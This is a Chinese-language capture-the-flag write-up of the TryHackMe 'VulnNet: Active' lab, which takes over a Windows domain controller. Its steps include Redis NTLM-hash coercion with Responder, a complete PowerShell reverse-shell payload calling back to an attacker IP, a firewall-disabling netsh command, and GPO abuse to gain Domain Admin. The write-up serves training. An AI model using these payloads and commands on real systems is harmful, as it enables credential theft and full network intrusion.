上海网站建设的网,wap网站 链接微信,网站 中国最早做网站的,徐州网站app开发VulnNet: Active
VulnNet Entertainment在他们以前的网络中遇到了不好的时光#xff0c;该网络遭受了多次破坏。现在#xff0c;他们移动了整个基础架构#xff0c;并再次聘请您作为核心渗透测试人员。您的目标是获得对系统的完全访问权限并破坏域。 这应该是我在thm打的最…VulnNet: Active
VulnNet Entertainment在他们以前的网络中遇到了不好的时光该网络遭受了多次破坏。现在他们移动了整个基础架构并再次聘请您作为核心渗透测试人员。您的目标是获得对系统的完全访问权限并破坏域。 这应该是我在thm打的最后一个中等难度的域渗透房间了因为剩下的ad渗透都是定位难 的房间
经验之谈非官方的单域渗透靶机往往都有卡死、非常卡的问题遇到不对劲直接重启靶机就完事了 端口扫描
循例 nmap 简单主动侦察
使用enum4linux:
enum4linux -a 10.10.134.253这里能看到域名, 但不完整 再使用crackmapexec vulnnet.localsmb
smb这里也没东西 Redis枚举
在上面的端口扫描结果中有一个亮眼的端口就是6379nmap显示这是redis 成功连上
但我目前对redis还较为薄弱thm上有一个redis房间过段时间再去看看
通过搜索引擎能够找到有关redis读取文件的文章 NTLM 回传攻击
NTLM回传攻击在thm的域渗透教程中都是有教过的
通过这个命令能够进行文件读取由于这里是在域内思路就是利用这个点然后访问攻击者开启的薄弱smb服务然后redis这里就会去尝试进行ntlm身份验证而攻击者也将获取该账户的ntlm hash
这个思路应该是没有问题的来尝试一下
使用responder开启服务
responder -I tun0redis执行文件读取
redis-cli -h 10.10.254.117 eval dofile(//10.14.39.48//hack) 0使用haiti帮助我们快速找到hashcat的类型值 hashcat直接爆 SMB枚举
现在我们有了一组初始凭据做的第一件事当然是回去smb看看有没有什么信息 在Enterprise-Share里发现一个powershell脚本 从这个文件名PurgeIrrelevantData和其内容很容易能猜测到这可能是个定时脚本
我们可以尝试利用其来reverse shellpayload:
$client New-Object System.Net.Sockets.TCPClient(10.14.39.48,8888);$stream $client.GetStream();[byte[]]$bytes 0..65535|%{0};while(($i $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback (iex $data 21 | Out-String );$sendback2 $sendback PS (pwd).Path ;$sendbyte ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()nc监听 getshell
本地提权
看到该账户有个SeImpersonatePrivilege 直接上msf 一键开启rdp dc这里是有防火墙拦截所以先把防火墙关了
netsh advfirewall set allprofiles state off将我们的账户加入本地管理员组同时进入rdp AD枚举
查看administrator账户我们会发现它是LA和DA 虽然我们现在已经彻底拿下了这个DC但我希望能借此为数不多的域渗透靶机来练习thm所教导的知识在这里我将练习sharphound
先开启smbserver 目标连接 SharpHound
跑sharphound 通过刚刚打开的smbserver将扫描结果传回 BloodHound
开启neo4j
neo4j console启动bloodhound并将zip丢进去 我们利用路径搜索从我们当前的账户到Domain Admins组有这么一条路径 AD利用
我们发现我们当前账户有权对security-pol这个gpo进行修改
那么我们将利用它
在rdp中打开mmc 在用户配置-控制面板设置 新建即时任务 将我们的账户添加到DA组 弄好之后使用gpupdate /force强制立即更新组策略 此时我们已经是DA 游戏结束
